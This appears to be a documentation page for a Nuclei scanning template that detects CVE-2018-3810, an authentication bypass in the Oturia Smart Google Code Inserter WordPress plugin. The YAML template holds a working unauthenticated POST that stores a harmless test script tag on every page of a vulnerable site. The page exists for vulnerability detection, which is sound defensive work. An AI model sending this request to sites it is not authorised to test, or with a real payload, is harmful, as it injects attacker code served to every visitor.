Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
ID: CVE-2018-3810
Severity: critical
Author: princechaddha
Tags: cve,cve2018,wordpress,google,edb,oturia
Description
Section titled “Description”Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
YAML Source
Section titled “YAML Source”id: CVE-2018-3810
info: name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass author: princechaddha severity: critical description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. impact: | An attacker can bypass authentication and gain unauthorized access to the affected WordPress site. remediation: | Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability. reference: - https://www.exploit-db.com/exploits/43420 - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 - https://wordpress.org/plugins/smart-google-code-inserter/#developers - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html - https://wpvulndb.com/vulnerabilities/8987 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-3810 cwe-id: CWE-287 epss-score: 0.792 epss-percentile: 0.98197 cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: oturia product: smart_google_code_inserter framework: wordpress tags: cve,cve2018,wordpress,google,edb,oturia
http: - method: POST path: - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("document.domain")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers: Content-Type: application/x-www-form-urlencoded
- method: GET path: - "{{BaseURL}}"
matchers-condition: and matchers: - type: word part: header words: - "text/html"
- type: word part: body words: - '<script>console.log("document.domain")</script>'
- type: status status: - 200# digest: 4a0a00473045022100c8a3717562868ecdb0d3b31229dfd14269ce9acfe34a68a2e63a9585b67a03d102206c2f1a5cfa70a22d749323c9feb023dc5cb32b99f593cbcef3f4e430f97a9090:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-3810.yaml"